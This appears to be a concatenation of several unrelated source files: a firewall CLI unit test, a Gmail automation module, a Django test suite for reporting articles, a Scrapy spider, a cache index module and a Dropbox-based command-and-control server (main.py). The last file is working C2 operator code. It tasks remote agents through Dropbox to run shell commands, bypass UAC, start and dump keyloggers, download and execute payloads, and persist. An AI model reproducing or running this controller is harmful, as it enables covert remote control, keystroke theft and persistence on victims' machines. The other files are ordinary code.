id=pvm_summary type=pvm name="Summary Vulnerability Mail"
id=app_cert_req type=cert_req name="Accept the certificate request"
id=rej_cert_req type=cert_req name="Reject the certificate request"
id=app_user_req type=user_req name="Accept the user request"
id=rej_user_req type=user_req name="Reject the user request"
id=sponsor_req type=sponsoring name="Sponsoring request"
id=smtp_test_msg type=smtp_conf name="Test SMTP configuration"
100 code=00a00100 msg="Ok\""""
response = self.client.send_command('CONFIG COMMUNICATION EMAIL TEMPLATE LIST')
self.assertEqual(response.output, expected)
self.assertEqual(response.ret, 100)
def test_list(self):
""" list format """
expected = """101 code=00a01000 msg="Begin" format="list"
[Result]
labo_network
Network_internals
100 code=00a00100 msg="Ok\""""
response = self.client.send_command('CONFIG WEBADMIN ACCESS SHOW')
self.assertEqual(response.output, expected)
self.assertEqual(response.ret, 100)
def test_xml(self):
""" xml text output """
expected = """101 code=00a01000 msg="Begin" format="xml"
<data format="xml"><filters total_lines="5">
<separator collapse="0" color="c0c0c0" comment="Remote Management: Go to System - Configuration to setup the web administration application access" first_ruleid="1" nb_elements="2" position="1" />
<filter action="pass" comment="Admin from everywhere" index="1" position="2" status="active" type="local_filter_slot"><noconnlog disk="0" ipfix="0" syslog="0" /><from><target type="any" value="any" /></from><to><port type="single" value="firewall_srv" /><port type="single" value="https" /><target type="group" value="firewall_all" /></to></filter>
<filter action="pass" comment="Allow Ping from everywhere" icmp_code="0" icmp_type="8" index="2" ipproto="icmp" position="3" proto="none" status="active" type="local_filter_slot"><noconnlog disk="0" ipfix="0" syslog="0" /><from><target type="any" value="any" /></from><to><target type="group" value="firewall_all" /></to></filter>
<separator collapse="0" color="c0c0c0" comment="Default policy" first_ruleid="3" nb_elements="1" position="4" />
<filter action="block" comment="Block all" index="3" position="5" status="active" type="local_filter_slot"><noconnlog disk="0" ipfix="0" syslog="0" /><from><target type="any" value="any" /></from><to><target type="any" value="any" /></to></filter>
</filters>
</data>
100 code=00a00100 msg="Ok\""""
response = self.client.send_command('CONFIG FILTER EXPLICIT index=1 type=filter output=xml')
self.assertEqual(response.output, expected)
self.assertEqual(response.ret, 100)
if __name__ == '__main__':
unittest.main()
| 4,458 |
higgins/automation/google/gmail.py
|
bfortuner/higgins
| 0 |
2169926
|
"""Query, Search, Parse Emails from Gmail.
TODO: Paginate over large requests. Right now it will timeout trying to download 1000s of emails.
Setup instructions here: https://github.com/jeremyephron/simplegmail
1. Create/reuse a google cloud project
2. Enable the Gmail API https://developers.google.com/workspace/guides/create-project?authuser=1#enable-api
3. Enable OAuth sign-in
4. Create credentials and download the client_secret.json file into repo root
https://developers.google.com/gmail/api/quickstart/python
"""
from typing import Dict, List
import dateutil
import elasticsearch
import elasticsearch_dsl
import pytz
from simplegmail import Gmail
from simplegmail.message import Message
from simplegmail.query import construct_query
import traceback
from higgins.automation.email import email_model, email_utils
from higgins.nlp import html2plain
def send_email(
to: str,
sender: str,
subject: str,
body_html: str = None,
body_plain: str = None,
cc: List[str] = None,
bcc: List[str] = None,
attachments: List[str] = None,
) -> Dict:
assert body_html is not None or body_plain is not None
client = Gmail()
params = {
"recipient": to,
"sender": sender,
"cc": cc,
"bcc": bcc,
"subject": subject,
"msg_html": body_html, # "<h1>Woah, my first email!</h1><br />This is an HTML email.",
"msg_plain": body_plain,
"attachments": attachments, # ["path/to/something/cool.pdf", "path/to/image.jpg", "path/to/script.py"],
"signature": True, # use my account signature
}
message = client.send_message(
**params
) # equivalent to send_message(to="<EMAIL>", sender=...)
return message
def get_emails():
client = Gmail()
# Unread messages in your inbox
messages = client.get_unread_inbox()
print(f"You have {len(messages)} unread messages.")
# Starred messages
# messages = client.get_starred_messages()
# ...and many more easy to use functions can be found in gmail.py!
# Print them out!
for message in messages[:2]:
print("To: " + message.recipient)
print("From: " + message.sender)
print("Subject: " + message.subject)
print("Date: " + message.date)
print("Preview: " + message.snippet)
print("Message Body: " + message.plain) # or message.html
def get_email(email_id: str, user_id: str = "me", include_html: bool = True) -> Dict:
client = Gmail()
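    # NOTE: _build_message_from_ref is a private simplegmail helper, so this call may
    # break across simplegmail versions.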
    message = client._build_message_from_ref(user_id=user_id, message_ref={"id": email_id})
return convert_message_to_dict(message, include_html)
def search_emails(
query_dicts: List[Dict], limit: int = 100, include_html: bool = False
) -> List[Dict]:
"""Search emails given queries.
Args:
query_dicts: List of email query parameters
limit: Maximum number of emails to return
Returns:
List of dictionaries with email body and metadata
Example: Return messages that are either:
- newer than 2 days old, unread, labeled "Finance" or both "Homework" and "CS"
OR
- newer than 1 month old, unread, labeled "Top Secret", but not starred.
query_dicts = [
{
"newer_than": (2, "day"),
"unread": True,
"labels":[["Finance"], ["Homework", "CS"]]
},
{
"newer_than": (1, "month"),
"unread": True,
"labels": ["Top Secret"],
"exclude_starred": True
}
]
"""
print(f"Searching emails with query {query_dicts}")
for dct in query_dicts:
dct = format_terms(dct)
client = Gmail()
# TODO: Add INBOX labels, Sent, etc
# Get your available labels
# User labels:
# Label(name='CHAT', id='CHAT'),
# Label(name='SENT', id='SENT'),
# Label(name='INBOX', id='INBOX'),
# Label(name='IMPORTANT', id='IMPORTANT'),
# Label(name='TRASH', id='TRASH'),
# Label(name='DRAFT', id='DRAFT'),
# Label(name='SPAM', id='SPAM'),
# Label(name='CATEGORY_FORUMS', id='CATEGORY_FORUMS'),
# Label(name='CATEGORY_UPDATES', id='CATEGORY_UPDATES'),
# Label(name='CATEGORY_PERSONAL', id='CATEGORY_PERSONAL'),
# Label(name='CATEGORY_PROMOTIONS', id='CATEGORY_PROMOTIONS'),
# Label(name='CATEGORY_SOCIAL', id='CATEGORY_SOCIAL'),
# Label(name='STARRED', id='STARRED'),
# Label(name='UNREAD', id='UNREAD'),
# Label(name='[Imap]/Drafts', id='Label_1'),
# Label(name='Urgent', id='Label_10'),
# Label(name='[Imap]/Sent', id='Label_2'),
# Label(name='craigslist', id='Label_2858204817852213362'),
# Label(name='[Imap]/Trash', id='Label_3'),
# Label(name='Notes', id='Label_4'),
# Label(name='Personal', id='Label_5'),
# Label(name='Receipts', id='Label_6'),
# Label(name='Work', id='Label_8'),
# Label(name='TODO', id='Label_8430892267769255145'),
# Label(name='Sent Messages', id='Label_9')]
labels = client.list_labels()
print("USR LABELS", labels)
# print(f"User labels: {labels}")
query = construct_query(*query_dicts)
print(query)
messages = client.get_messages(query=query)
print(f"Query returned {len(messages)} messages")
emails = []
for message in messages[:limit]:
try:
email = convert_message_to_dict(message, include_html)
emails.append(email)
except Exception as e:
print(e)
print(traceback.format_exc())
return emails
def convert_message_to_dict(message: Message, include_html: bool = False) -> Dict:
sender_name, sender_address = email_utils.normalize_email_address(message.sender)
# For now, set everything to pacific time
date = dateutil.parser.parse(message.date, ignoretz=True, fuzzy=True)
date = pytz.timezone("US/Pacific").localize(date)
email = {
"recipient": message.recipient,
"sender": message.sender,
"sender_name": sender_name,
"sender_address": sender_address,
"subject": message.subject,
"date": date,
"preview": message.snippet,
"google_id": message.id,
"thread_id": message.thread_id,
"label_ids": [label.name for label in message.label_ids],
"plain": extract_plain_text(message),
"html": None,
"markdown": None,
}
if bool(message.html):
html_extracts = html2plain.parse_html(message.html)
email["html"] = html_extracts["simplified"]
email["plain"] = html_extracts["text"]
email["markdown"] = html_extracts["markdown"]
if not include_html:
email["html"] = None
return email
def extract_plain_text(message: Message) -> str:
plain = ""
if bool(message.html):
# plain = email_utils.parse_html_v2(message.html)
plain = email_utils.parse_html_v3(message.html)
elif bool(message.plain):
plain = message.plain
plain = email_utils.clean_email_body(plain)
return plain
def format_terms(terms: Dict) -> Dict:
# Bug in library. If unread=False, it behaves as unread=True
if "unread" in terms and not terms["unread"]:
del terms["unread"]
if "read" in terms and not terms["read"]:
del terms["read"]
return terms
def gmail_to_elastic(query: Dict, limit: int = 100):
"""Load emails from Gmail API query into Elasticsearch."""
messages = search_emails(query_dicts=[query], limit=limit)
from tqdm import tqdm
for dct in tqdm(messages):
dct["email_id"] = email_utils.hash_email(dct)
email = email_model.from_gmail_dict(dct)
email.save()
# TODO: Add Bulk support
# conn = elasticsearch_dsl.connections.get_connection()
# elasticsearch.helpers.bulk(conn, (d.to_dict(True) for d in docs))
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
def search_elastic_emails(query: Dict):
client = Elasticsearch()
s = Search(using=client, index="email")
resp = s.execute()
print(f"Hits: {resp.hits.total.value}")
def update_local_emails():
# Update local emails to have new HTML preprocessing
emails = email_utils.search_local_emails([], dataset_dir="data/emails")
for email in emails:
google_email = get_email(email["google_id"])
email_utils.save_email(google_email, labels=email.get("model_labels"))
if __name__ == "__main__":
# msg = send_email(
# to="<EMAIL>",
# sender="<EMAIL>",
# subject="Hello Brendan",
# body_plain="This is an email body"
# )
# print(msg)
# get_emails()
# messages = search_emails(
# [
# dict(
# sender="<EMAIL>",
# newer_than=(10, "day"),
# # unread=None,
# labels=["INBOX"],
# # exact_phrase=None,
# # subject=None,
# )
# ]
# )
messages = gmail_to_elastic(
query=dict(
recipient="<EMAIL>",
newer_than=(365, "day"),
exclude_labels=[["promotions"], ["social"], ["forums"]],
# google supports these labels in queries:
# finance, purchases, updates, travel, social, promotions, inbox
),
limit=100000,
)
# search_elastic_emails({})
# update_local_emails()
| 9,337 |
authors/apps/articles/tests/test_report_article.py
|
andela/ah-backend-summer
| 1 |
2169751
|
from django.urls import reverse
from rest_framework import status
from authors.apps.authentication.models import User
from authors.apps.articles.models import Report
from ...authentication.tests.base_class import BaseTest
from .test_data.report_article_data import *
class TestReportArticle(BaseTest):
def setUp(self):
super().setUp()
self.user = self.activated_user()
self.article = self.create_article(self.user)
self.url = reverse('articles:report-article',
kwargs={'slug': self.article.slug})
self.reports_url = reverse('articles:reports')
def create_article_using_different_user(self):
"""
create_article_using_different_user creates an article using a
different user
"""
user = User.objects.create_user(username='oma',
email='<EMAIL>',
password='<PASSWORD>')
return self.create_article(user)
def report_an_article(self):
"""
report_an_article creates a report
"""
article = self.create_article_using_different_user()
return Report.objects.create(reporter=self.user.profile,
article=article,
reason="okay")
def create_admin(self):
"""
create_admin creates a superuser
"""
return User.objects.create_superuser(username='admin',
email='<EMAIL>',
password='<PASSWORD>')
def test_user_cannot_report_article_which_does_not_exist(self):
"""
Tests that a user cannot report an article that does not exist
"""
self.client.force_authenticate(user=self.user)
self.url = reverse('articles:report-article',
kwargs={'slug': 'jfdsgga'})
response = self.client.post(self.url, data=valid_report_article_data)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(response.data["message"],
"The article you're trying to report does not exist")
def test_user_cannot_report_their_article(self):
"""
Tests that a user cannot report their article
"""
self.client.force_authenticate(user=self.user)
response = self.client.post(self.url, data=valid_report_article_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(response.data["message"],
"You cannot report your own article")
def test_same_user_cannot_report_same_article_twice(self):
"""
Tests that a user cannot report the same article twice
"""
article = self.create_article_using_different_user()
self.client.force_authenticate(user=self.user)
self.url = reverse('articles:report-article',
kwargs={'slug': article.slug})
self.client.post(self.url, data=valid_report_article_data)
response = self.client.post(self.url, data=valid_report_article_data)
self.assertEqual(response.status_code,
status.HTTP_422_UNPROCESSABLE_ENTITY)
self.assertEqual(response.data["message"],
"You already reported this article")
def test_user_can_report_an_article(self):
"""
Tests that a user can report an article
"""
article = self.create_article_using_different_user()
self.client.force_authenticate(user=self.user)
self.url = reverse('articles:report-article',
kwargs={'slug': article.slug})
response = self.client.post(self.url, data=valid_report_article_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data["message"],
f"You have reported this article {article.title}")
def test_user_cannot_report_an_article_when_unauthenticated(self):
"""
Tests that a user cannot report an article unless they are logged in
"""
response = self.client.post(self.url, data=valid_report_article_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_user_cannot_report_an_article_without_reason(self):
"""
Tests user cannot report an article without a reason
"""
article = self.create_article_using_different_user()
self.client.force_authenticate(user=self.user)
self.url = reverse('articles:report-article',
kwargs={'slug': article.slug})
response = self.client.post(self.url, data=no_reason_data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_retrieve_reports_they_made(self):
"""
Tests that a user can retrieve the reports they have made
"""
self.report_an_article()
self.client.force_authenticate(user=self.user)
response = self.client.get(self.reports_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_cannot_retrieve_reports_they_made_when_unauthenticated(self):
"""
Tests user cannot retrieve reports they made unless they are
authenticated
"""
response = self.client.get(self.reports_url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_admin_can_retrieve_reports_made(self):
"""
Tests admin can retrieve all reports users have made
"""
report = self.report_an_article()
admin = self.create_admin()
self.client.force_authenticate(user=admin)
response = self.client.get(self.reports_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_can_retrieve_a_report_they_made(self):
"""
Tests a user can retrieve a report they made
"""
report = self.report_an_article()
self.client.force_authenticate(user=self.user)
report_url = reverse('articles:report', kwargs={'id': report.id})
response = self.client.get(report_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data["report"]["reason"], report.reason)
self.assertEqual(response.data["report"]["reporter"]["username"],
self.user.profile.username)
def test_user_cant_retrieve_a_report_they_made_when_unauthenticated(self):
"""
Test user cannot retrieve a report when they are unauthenticated
"""
report = self.report_an_article()
report_url = reverse('articles:report', kwargs={'id': report.id})
response = self.client.get(report_url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_user_cannot_retrieve_a_report_they_didnt_make(self):
"""
Tests a user cannot retrieve a report they didn't make
"""
report = self.report_an_article()
user = self.create_another_user_in_db()
self.client.force_authenticate(user=user)
report_url = reverse('articles:report', kwargs={'id': report.id})
response = self.client.get(report_url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_admin_can_retrieve_a_single_report(self):
"""
Tests admin can retrieve a single report
"""
report = self.report_an_article()
admin = self.create_admin()
self.client.force_authenticate(user=admin)
report_url = reverse('articles:report', kwargs={'id': report.id})
response = self.client.get(report_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data["report"]["reason"], report.reason)
self.assertEqual(response.data["report"]["reporter"]["username"],
self.user.profile.username)
| 8,139 |
src/Development_Files/Scraping/Spiders/KlassikaSpider.py
|
drummk2/EnglishToRussianTransliteration
| 1 |
2169889
|
# Author: <NAME>
# Date: February 15th 2017
# This script is used to scrape some Russian text from the 'klassika.ru' website.
import scrapy
class KlassikaSpider (scrapy.Spider):
name = 'klassika_spider'
start_urls = ['http://www.klassika.ru/proza/goncharov/oblomov.txt']
def toCyrillic(self, cyrillic_names):
for name in cyrillic_names:
            print(name.encode('utf-8'))
def parse(self, response):
cyrillic_text = response.xpath('//body/text()').extract()
self.toCyrillic(cyrillic_text)
| 529 |
tarn/cache/index.py
|
neuro-ml/tarn
| 0 |
2170208
|
import gzip
import logging
import os
import shutil
import warnings
from itertools import chain
from pathlib import Path
from typing import Any
from ..digest import key_to_relative
from ..local import Storage, DiskBase
from ..interface import Key
from ..utils import create_folders, to_read_only, copy_file, match_files, adjust_permissions
from ..exceptions import StorageCorruption, ReadError
from .serializers import Serializer, SerializerError
from .compat import BadGzipFile
logger = logging.getLogger(__name__)
DATA_FOLDER = 'data'
TEMP_FOLDER = 'temp'
HASH_FILENAME = 'hash.bin'
GZIP_COMPRESSION = 1
class CacheIndex(DiskBase):
def __init__(self, root: Path, storage: Storage, serializer: Serializer):
super().__init__(root)
self.storage = storage
self.serializer = serializer
def _check_value_consistency(self, base: Path, key: Key, value: Any, context):
check_consistency(base / HASH_FILENAME, context, check_existence=True)
def _check_folder_consistency(self, base: Path, key: Key, folder: Path, context):
match_files(base / HASH_FILENAME, folder / HASH_FILENAME)
def _write(self, base: Path, key: Key, value: Any, context: Any):
data_folder, temp_folder = base / DATA_FOLDER, base / TEMP_FOLDER
create_folders(data_folder, self.permissions, self.group)
create_folders(temp_folder, self.permissions, self.group)
self.serializer.save(value, temp_folder)
self._mirror_to_storage(temp_folder, data_folder)
self._save_meta(base, context)
def _replicate(self, base: Path, key: Key, source: Path, context):
# data
destination = base / DATA_FOLDER
shutil.copytree(source / DATA_FOLDER, destination)
for dst in chain([destination], destination.rglob('*')):
adjust_permissions(dst, self.permissions, self.group, read_only=not dst.is_dir())
# meta
copy_file(source / HASH_FILENAME, base / HASH_FILENAME)
to_read_only(base / HASH_FILENAME, self.permissions, self.group)
def _read(self, key, context):
def load(base):
try:
return self.serializer.load(base / DATA_FOLDER, self.storage)
except (SerializerError, ReadError):
raise
except Exception as e:
raise RuntimeError(f'An error occurred while loading the cache for "{key}" at {base}') from e
return self._read_entry(key, context, load)
def replicate_to(self, key, context, store):
self._read_entry(key, context, lambda base: store(key, base))
def _read_entry(self, key, context, reader):
base = self.root / key_to_relative(key, self.levels)
with self.locker.read(key, base):
if not base.exists():
logger.info('Key %s: path not found "%s"', key, base)
return None, False
hash_path = base / HASH_FILENAME
# we either have a valid folder
if hash_path.exists():
check_consistency(hash_path, context)
try:
return reader(base), True
except ReadError as e:
# couldn't find the hash - the cache is corrupted
logger.info('Error while reading %s: %s: %s', key, type(e).__name__, e)
# or it is corrupted, in which case we can remove it
with self.locker.write(key, base):
self._cleanup_corrupted(base, key)
return None, False
# internal
def _save_meta(self, base, pickled):
hash_path = base / HASH_FILENAME
# hash
with gzip.GzipFile(hash_path, 'wb', compresslevel=GZIP_COMPRESSION, mtime=0) as file:
file.write(pickled)
to_read_only(hash_path, self.permissions, self.group)
def _mirror_to_storage(self, source: Path, destination: Path):
for file in source.glob('**/*'):
target = destination / file.relative_to(source)
if file.is_dir():
create_folders(target, self.permissions, self.group)
else:
with open(target, 'w') as fd:
fd.write(self.storage.write(file))
os.remove(file)
to_read_only(target, self.permissions, self.group)
shutil.rmtree(source)
def _cleanup_corrupted(self, folder, digest):
message = f'Corrupted storage at {self.root} for key {digest}. Cleaning up.'
warnings.warn(message, RuntimeWarning)
logger.warning(message)
shutil.rmtree(folder)
def check_consistency(hash_path, pickled, check_existence: bool = False):
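    # Compares the gzip-compressed hash stored on disk with the current pickled context
    # and raises StorageCorruption on any mismatch or on a corrupted/missing file.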
suggestion = f'You may want to delete the {hash_path.parent} folder.'
if check_existence and not hash_path.exists():
raise StorageCorruption(f'The pickled graph is missing. {suggestion}')
try:
with gzip.GzipFile(hash_path, 'rb') as file:
dumped = file.read()
if dumped != pickled:
raise StorageCorruption(
f'The dumped and current pickle do not match at {hash_path}: {dumped} {pickled}. {suggestion}'
)
except BadGzipFile:
raise StorageCorruption(f'The hash is corrupted. {suggestion}') from None
| 5,274 |
main.py
|
0x09AL/DropboxC2C
| 161 |
2169795
|
import os
import dropbox
import time
import threading
import cmd
import json
import base64
apiKey = "CHANGE API KEY"
banner = """
$$$$$$$\ $$\ $$$$$$\ $$$$$$\ $$$$$$\
$$ __$$\ $$ | $$ __$$\ $$ __$$\ $$ __$$\
$$ | $$ | $$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$ / \__|\__/ $$ |$$ / \__|
$$ | $$ |$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ \$$\ $$ |$$$$$$\ $$ | $$$$$$ |$$ |
$$ | $$ |$$ | \__|$$ / $$ |$$ / $$ |$$ | $$ |$$ / $$ | \$$$$ / \______|$$ | $$ ____/ $$ |
$$ | $$ |$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ $$< $$ | $$\ $$ | $$ | $$\
$$$$$$$ |$$ | \$$$$$$ |$$$$$$$ |$$$$$$$ |\$$$$$$ |$$ /\$$\ \$$$$$$ |$$$$$$$$\ \$$$$$$ |
\_______/ \__| \______/ $$ ____/ \_______/ \______/ \__/ \__| \______/ \________| \______/
$$ |
$$ |
\__|
"""
# Create a dropbox object
dbx = dropbox.Dropbox(apiKey)
offlineAgents = []
activeAgents = []
completedTasks = {}
interactedAgent = ""
taskLock = False
# This is the agent Checker
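# An agent counts as online when its 'lasttime' file was updated within the last 60 seconds
# (see the servertime - 60 <= agenttime check below).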
def isInsideTimeline(agent):
try:
md, res = dbx.files_download('/%s/lasttime' % agent)
agenttime = float(res.content.strip())
servertime = float(time.time())
if(servertime-60)<=agenttime:
return True
else:
return False
except dropbox.exceptions.HttpError as err:
print('[-] HTTP error ', err)
return False
class TaskChecker(object):
def __init__(self, interval=5):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
while True:
checkCompletedTasks()
time.sleep(self.interval)
def dropboxFileExists(path,file):
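    # Returns True if `file` exists directly under `path` in the Dropbox app folder.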
for fileName in dbx.files_list_folder(path).entries:
if fileName.name == file:
return True
return False
def checkCompletedTasks():
for agent in activeAgents:
path = '/%s/output' % agent
try:
if(dropboxFileExists('/%s/' % agent ,'output')):
_, res = dbx.files_download(path)
if(res.content != ""):
outputData = json.loads(res.content.replace('\n',''))
else:
outputData = {}
for data in outputData:
if(data not in completedTasks[agent]):
completedTasks[agent].append(data)
print "\n==== Agent " + agent + " Task: " + data + " ==== "
print base64.b64decode(outputData[data]["OUTPUT"])
taskUpdater(agent)
except Exception, err:
print "[-] Error Receiving Completed Tasks [-]"
print err
pass
def taskUpdater(agent):
tasks = {}
path = '/%s/tasks' % agent
mode = (dropbox.files.WriteMode.overwrite)
try:
_, res = dbx.files_download(path)
if(res.content != ""):
tasks = json.loads(res.content.replace('\n',''))
else:
tasks = {}
for completedTask in completedTasks[agent]:
tasks[completedTask]["STATUS"] = "Completed"
dbx.files_upload(json.dumps(tasks),path,mode)
except Exception, err:
print "[-] Error Updating Tasks [-]"
print err
pass
def sendTask(agent,command):
tasks = {}
path = '/%s/tasks' % agent
mode = (dropbox.files.WriteMode.add)
defaultStatus = "Waiting"
for file in dbx.files_list_folder('/%s/' % agent).entries:
if(file.name == 'tasks'):
mode = (dropbox.files.WriteMode.overwrite)
_, res = dbx.files_download(path)
if(res.content != ""):
tasks = json.loads(res.content.replace('\n',''))
else:
tasks = {}
break
numberOfTasks = 0
for task in tasks:
numberOfTasks += 1
tasks[numberOfTasks+1] = {"STATUS":defaultStatus,"COMMAND":command}
try:
dbx.files_upload(json.dumps(tasks),path,mode)
except Exception:
print "[-] Error Sending Task [-]"
pass
class AgentChecker(object):
def __init__(self, interval=10):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
# This will list all the folders which are created by the agents.
global activeAgents
while True:
try:
for agent in dbx.files_list_folder('').entries:
agent = agent.name
if(agent not in activeAgents and isInsideTimeline(agent)):
activeAgents.append(agent)
print "[+] Agent " + agent + " is online [+]"
                        completedTasks[agent] = [] # start tracking completed tasks for this agent
elif(agent in activeAgents and not isInsideTimeline(agent)):
activeAgents.remove(agent)
                        del completedTasks[agent] # stop tracking tasks for the offline agent
print "\n[+] Agent " + agent + " is offline [+]"
time.sleep(self.interval)
except Exception:
print "[-] HTTP Error [-]"
time.sleep(30)
pass
def listAgents():
print "\n[+] Listing Agents [+]"
if(len(activeAgents) > 0):
for agent in activeAgents:
print agent
else:
print "[-] No online agents found. [-]"
print "\n"
def changeInteractedAgent(agent):
global interactedAgent
interactedAgent = agent
class Input(cmd.Cmd):
AGENTS = activeAgents
prompt = "C2C#> "
def do_agents(self,s):
listAgents()
def do_interact(self,agent):
self.AGENTS = activeAgents
if(agent in self.AGENTS):
print "[+] Interacting with : " + agent + " [+]"
changeInteractedAgent(agent)
agentInteraction = AgentCMD()
agentInteraction.prompt = self.prompt + "(" + agent + "): "
agentInteraction.cmdloop()
else:
print "[-] Agent not valid [-]"
def complete_interact(self, text, line, begidx, endidx):
if not text:
completions = self.AGENTS[:]
else:
completions = [ f
for f in self.AGENTS
if f.startswith(text)
]
return completions
def do_quit(self,s):
exit(0)
def emptyline(self):
pass
def getInteractedAgent():
global interactedAgent
return interactedAgent
class AgentCMD(cmd.Cmd):
# This is the Agent command line .
def do_sysinfo(self,s):
sendTask(interactedAgent,"{SHELL}systeminfo")
def do_bypassuac(self,s):
sendTask(interactedAgent,"bypassuac")
def do_keylog_start(self,s):
sendTask(interactedAgent,"keylog_start")
def do_keylog_stop(self,s):
sendTask(interactedAgent,"keylog_stop")
def do_keylog_dump(self,s):
sendTask(interactedAgent,"keylog_dump")
def do_exec(self,s):
sendTask(interactedAgent,"{SHELL}%s" % s)
def do_downloadexecute(self,s):
sendTask(interactedAgent,"{DOWNLOAD}%s" % s)
def do_persist(self,s):
sendTask(interactedAgent,"persist")
    def do_back(self,s):
        changeInteractedAgent("")
        return True
def emptyline(self):
pass
def main():
print banner
agents = AgentChecker()
checker = TaskChecker()
commandInputs = Input().cmdloop()
if __name__ == "__main__":
main()
| 7,074 |